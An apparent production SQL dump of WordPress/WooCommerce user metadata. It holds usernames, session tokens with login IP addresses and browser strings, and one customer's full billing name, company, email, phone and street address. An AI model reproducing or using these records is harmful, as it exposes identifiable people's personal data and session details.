INSERT INTO `wp_usermeta` VALUES (8750, 529, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8751, 529, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8752, 529, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8753, 529, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8754, 529, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8755, 529, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8756, 529, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8757, 529, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8758, 529, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8759, 529, '_yoast_wpseo_profile_updated', '1489168840'); 
INSERT INTO `wp_usermeta` VALUES (8760, 529, 'session_tokens', 'a:1:{s:64:"d66c7d5ee8a98b1f6404b14912641b5eaa70a45801d0877b34ada978a3ce145f";a:4:{s:10:"expiration";i:1490378450;s:2:"ip";s:13:"69.85.201.170";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1489168850;}}'); 
INSERT INTO `wp_usermeta` VALUES (8762, 530, 'nickname', 'larkin.k.lindsey.ctr'); 
INSERT INTO `wp_usermeta` VALUES (8763, 530, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8764, 530, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8765, 530, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8766, 530, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8767, 530, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8768, 530, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8769, 530, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8770, 530, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8771, 530, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8772, 530, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8773, 530, '_yoast_wpseo_profile_updated', '1489176930'); 
INSERT INTO `wp_usermeta` VALUES (8775, 531, 'nickname', 'bryan.curry'); 
INSERT INTO `wp_usermeta` VALUES (8776, 531, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8777, 531, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8778, 531, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8779, 531, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8780, 531, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8781, 531, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8782, 531, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8783, 531, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8784, 531, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8785, 531, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8786, 531, '_yoast_wpseo_profile_updated', '1489184508'); 
INSERT INTO `wp_usermeta` VALUES (8787, 531, 'session_tokens', 'a:1:{s:64:"eb5d7db1541af6a5badfde71f8ae2f31a3d777640e20ca80e620d82808eaaf91";a:4:{s:10:"expiration";i:1490394119;s:2:"ip";s:13:"192.91.171.36";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1489184519;}}'); 
INSERT INTO `wp_usermeta` VALUES (8788, 531, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8789, 532, 'nickname', 'jon.k.loughmiller'); 
INSERT INTO `wp_usermeta` VALUES (8790, 532, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8791, 532, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8792, 532, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8793, 532, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8794, 532, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8795, 532, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8796, 532, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8797, 532, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8798, 532, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8799, 532, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8800, 532, '_yoast_wpseo_profile_updated', '1489192940'); 
INSERT INTO `wp_usermeta` VALUES (8801, 532, 'session_tokens', 'a:1:{s:64:"0dfc854eb992adc4a5f8926eb7a6435ea7a4bafe73471993059ee68082eb3f53";a:4:{s:10:"expiration";i:1490402552;s:2:"ip";s:12:"192.35.35.36";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489192952;}}'); 
INSERT INTO `wp_usermeta` VALUES (8802, 532, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8803, 533, 'nickname', 'david.pilkerton'); 
INSERT INTO `wp_usermeta` VALUES (8804, 533, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8805, 533, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8806, 533, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8807, 533, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8808, 533, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8809, 533, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8810, 533, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8811, 533, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8812, 533, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8813, 533, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8814, 533, '_yoast_wpseo_profile_updated', '1489325844'); 
INSERT INTO `wp_usermeta` VALUES (8815, 533, 'session_tokens', 'a:1:{s:64:"ecaae6d4e243a8a29c09a737cb007303d5c063ab7eec6c37c8920daeb35ee9c8";a:4:{s:10:"expiration";i:1490535455;s:2:"ip";s:13:"206.125.176.3";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489325855;}}'); 
INSERT INTO `wp_usermeta` VALUES (8816, 533, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8818, 534, 'nickname', 'dsmith'); 
INSERT INTO `wp_usermeta` VALUES (8819, 534, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8820, 534, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8821, 534, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8822, 534, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8823, 534, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8824, 534, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8825, 534, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8826, 534, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8827, 534, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8828, 534, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8829, 534, '_yoast_wpseo_profile_updated', '1489432752'); 
INSERT INTO `wp_usermeta` VALUES (8830, 534, 'session_tokens', 'a:1:{s:64:"502f6ee3cffb5babb59fc623ad6d98245e31c296646bec9c1ef7e65798ca7dfb";a:4:{s:10:"expiration";i:1490642361;s:2:"ip";s:11:"71.162.5.64";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1489432761;}}'); 
INSERT INTO `wp_usermeta` VALUES (8831, 535, 'nickname', 'marjorypondexterjp9308'); 
INSERT INTO `wp_usermeta` VALUES (8832, 535, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8833, 535, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8834, 535, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8835, 535, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8836, 535, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8837, 535, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8838, 535, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8839, 535, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8840, 535, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8841, 535, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8842, 535, '_yoast_wpseo_profile_updated', '1489499370'); 
INSERT INTO `wp_usermeta` VALUES (8843, 535, 'session_tokens', 'a:1:{s:64:"0497f38d906bc92827684154bfa2976e78aa67b8142fc33ee3fcebe12867dcd7";a:4:{s:10:"expiration";i:1490708980;s:2:"ip";s:14:"192.119.14.105";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1489499380;}}'); 
INSERT INTO `wp_usermeta` VALUES (8844, 535, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8845, 536, 'nickname', 'martin.cunningham'); 
INSERT INTO `wp_usermeta` VALUES (8846, 536, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8847, 536, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8848, 536, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8849, 536, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8850, 536, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8851, 536, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8852, 536, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8853, 536, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8854, 536, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8855, 536, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8856, 536, '_yoast_wpseo_profile_updated', '1489502459'); 
INSERT INTO `wp_usermeta` VALUES (8857, 536, 'session_tokens', 'a:1:{s:64:"65ef9bf1dd347c7d940153752cba47d759611de78fd400622867c90039a59d31";a:4:{s:10:"expiration";i:1490712070;s:2:"ip";s:14:"64.251.131.130";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1489502470;}}'); 
INSERT INTO `wp_usermeta` VALUES (8858, 537, 'nickname', 'jeff.christafore'); 
INSERT INTO `wp_usermeta` VALUES (8859, 537, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8860, 537, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8861, 537, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8862, 537, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8863, 537, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8864, 537, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8865, 537, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8866, 537, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8867, 537, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8868, 537, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8869, 537, '_yoast_wpseo_profile_updated', '1489511010'); 
INSERT INTO `wp_usermeta` VALUES (8871, 537, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8872, 537, 'session_tokens', 'a:1:{s:64:"ac3ab13451bfe6c830f721be3fbfe09829f67844a681293b2194ba58e07867a9";a:4:{s:10:"expiration";i:1490721925;s:2:"ip";s:13:"198.24.101.98";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489512325;}}'); 
INSERT INTO `wp_usermeta` VALUES (8873, 538, 'nickname', 'eshields'); 
INSERT INTO `wp_usermeta` VALUES (8874, 538, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8875, 538, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8876, 538, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8877, 538, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8878, 538, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8879, 538, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8880, 538, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8881, 538, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8882, 538, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8883, 538, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8884, 538, '_yoast_wpseo_profile_updated', '1489514356'); 
INSERT INTO `wp_usermeta` VALUES (8885, 538, 'session_tokens', 'a:1:{s:64:"259ddefe2833cac0cddfb84dfe6556e6a75f3cd6e1c1ab5fa08fc3091def75d4";a:4:{s:10:"expiration";i:1490723964;s:2:"ip";s:15:"204.136.186.141";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489514364;}}'); 
INSERT INTO `wp_usermeta` VALUES (8886, 538, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8887, 539, 'nickname', 'aleida.moreno'); 
INSERT INTO `wp_usermeta` VALUES (8888, 539, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8889, 539, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8890, 539, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8891, 539, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8892, 539, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8893, 539, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8894, 539, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8895, 539, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8896, 539, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8897, 539, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8898, 539, '_yoast_wpseo_profile_updated', '1489517306'); 
INSERT INTO `wp_usermeta` VALUES (8899, 539, 'session_tokens', 'a:1:{s:64:"05435774c82aa515819e756cb6510e22918dbbfb66c6ff7ffff2702268f25e36";a:4:{s:10:"expiration";i:1490726915;s:2:"ip";s:14:"189.176.198.89";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1489517315;}}'); 
INSERT INTO `wp_usermeta` VALUES (8900, 540, 'nickname', 'alan.g.hillberg.civ'); 
INSERT INTO `wp_usermeta` VALUES (8901, 540, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8902, 540, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8903, 540, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8904, 540, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8905, 540, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8906, 540, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8907, 540, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8908, 540, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8909, 540, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8910, 540, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8911, 540, '_yoast_wpseo_profile_updated', '1489521908'); 
INSERT INTO `wp_usermeta` VALUES (8912, 540, 'session_tokens', 'a:1:{s:64:"62f4f37acddf9c04d12fccd19c113860258fc1ec2043f6f14d420ceee2ac0086";a:4:{s:10:"expiration";i:1491578419;s:2:"ip";s:12:"131.43.10.30";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491405619;}}'); 
INSERT INTO `wp_usermeta` VALUES (8913, 541, 'nickname', 'Cnimbalkar'); 
INSERT INTO `wp_usermeta` VALUES (8914, 541, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8915, 541, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8916, 541, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8917, 541, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8918, 541, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8919, 541, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8920, 541, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8921, 541, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8922, 541, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8923, 541, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8924, 541, '_yoast_wpseo_profile_updated', '1489564517'); 
INSERT INTO `wp_usermeta` VALUES (8925, 541, 'session_tokens', 'a:1:{s:64:"bafbd5357acab6006461f149de6b92611aa037b46b938cd8ba56a509c7a891b7";a:4:{s:10:"expiration";i:1490774128;s:2:"ip";s:12:"219.65.67.26";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1489564528;}}'); 
INSERT INTO `wp_usermeta` VALUES (8926, 541, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8927, 542, 'nickname', 'dakdav96'); 
INSERT INTO `wp_usermeta` VALUES (8928, 542, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8929, 542, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8930, 542, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8931, 542, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8932, 542, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8933, 542, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8934, 542, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8935, 542, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8936, 542, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8937, 542, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8938, 542, '_yoast_wpseo_profile_updated', '1489581525'); 
INSERT INTO `wp_usermeta` VALUES (8939, 542, 'session_tokens', 'a:2:{s:64:"2cb428fdcc9c5a45188ce623831ff09e92f60d4d056f41519eff23e1d0c4271e";a:4:{s:10:"expiration";i:1490791135;s:2:"ip";s:10:"132.3.9.79";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489581535;}s:64:"9c84021d189a277d0110ee1ae03af21aca8654a9561a9626e8e279d2bab4ac16";a:4:{s:10:"expiration";i:1489754390;s:2:"ip";s:10:"132.3.9.80";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489581590;}}'); 
INSERT INTO `wp_usermeta` VALUES (8940, 543, 'nickname', 'skmcneil'); 
INSERT INTO `wp_usermeta` VALUES (8941, 543, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8942, 543, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8943, 543, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8944, 543, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8945, 543, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8946, 543, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8947, 543, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8948, 543, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8949, 543, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8950, 543, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8951, 543, '_yoast_wpseo_profile_updated', '1489584247'); 
INSERT INTO `wp_usermeta` VALUES (8952, 543, 'session_tokens', 'a:1:{s:64:"cc6b0c8b77082e985afb3e94d1d9fd6fd57f7e65fdfd1c5ba2b7a87ab4720ae9";a:4:{s:10:"expiration";i:1490793860;s:2:"ip";s:13:"146.126.51.51";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1489584260;}}'); 
INSERT INTO `wp_usermeta` VALUES (8953, 544, 'nickname', 'Christopher.degeyter'); 
INSERT INTO `wp_usermeta` VALUES (8954, 544, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8955, 544, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8956, 544, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8957, 544, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8958, 544, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8959, 544, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8960, 544, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8961, 544, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8962, 544, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8963, 544, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8964, 544, '_yoast_wpseo_profile_updated', '1489596360'); 
INSERT INTO `wp_usermeta` VALUES (8965, 544, 'session_tokens', 'a:1:{s:64:"b2ec6e1544fc20e3f775391cf5b297858ce331c8c9ecc9af1fd7e5cd9dfe84f2";a:4:{s:10:"expiration";i:1490805970;s:2:"ip";s:14:"208.87.237.201";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1489596370;}}'); 
INSERT INTO `wp_usermeta` VALUES (8966, 544, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8967, 545, 'nickname', 'mgillons'); 
INSERT INTO `wp_usermeta` VALUES (8968, 545, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8969, 545, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8970, 545, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8971, 545, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8972, 545, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8973, 545, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8974, 545, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8975, 545, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8976, 545, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8977, 545, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8978, 545, '_yoast_wpseo_profile_updated', '1489602649'); 
INSERT INTO `wp_usermeta` VALUES (8979, 545, 'session_tokens', 'a:1:{s:64:"1b022621edc99b6a897616e2fe8011e28bd7a8ad059a6130a6f4d15adaa30b84";a:4:{s:10:"expiration";i:1492017912;s:2:"ip";s:12:"69.51.141.98";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491845112;}}'); 
INSERT INTO `wp_usermeta` VALUES (8980, 546, 'nickname', 'james'); 
INSERT INTO `wp_usermeta` VALUES (8981, 546, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8982, 546, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8983, 546, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8984, 546, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8985, 546, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8986, 546, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8987, 546, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8988, 546, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8989, 546, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8990, 546, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8991, 546, '_yoast_wpseo_profile_updated', '1489607396'); 
INSERT INTO `wp_usermeta` VALUES (8992, 546, 'session_tokens', 'a:1:{s:64:"f8c4d04ac80b1ee78428da3f3ab00b2bc43eeebed0a970aa9385a00099a4acd5";a:4:{s:10:"expiration";i:1490817007;s:2:"ip";s:12:"97.79.230.66";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1489607407;}}'); 
INSERT INTO `wp_usermeta` VALUES (8993, 546, 'billing_first_name', 'James'); 
INSERT INTO `wp_usermeta` VALUES (8994, 546, 'billing_last_name', 'Barnes'); 
INSERT INTO `wp_usermeta` VALUES (8995, 546, 'billing_company', 'Texas Pneumatic Systems'); 
INSERT INTO `wp_usermeta` VALUES (8996, 546, 'billing_email', 'james@txps.com'); 
INSERT INTO `wp_usermeta` VALUES (8997, 546, 'billing_phone', '181779400682171'); 
INSERT INTO `wp_usermeta` VALUES (8998, 546, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (8999, 546, 'billing_address_1', '2404 Superior Dr'); 
INSERT INTO `wp_usermeta` VALUES (9000, 546, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (9001, 546, 'billing_city', 'Pantego'); 
INSERT INTO `wp_usermeta` VALUES (9002, 546, 'billing_state', 'TX'); 
INSERT INTO `wp_usermeta` VALUES (9003, 546, 'billing_postcode', '76013'); 
INSERT INTO `wp_usermeta` VALUES (9004, 547, 'nickname', 'adam.ellis'); 
INSERT INTO `wp_usermeta` VALUES (9005, 547, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9006, 547, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9007, 547, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9008, 547, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9009, 547, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9010, 547, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9011, 547, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9012, 547, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9013, 547, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
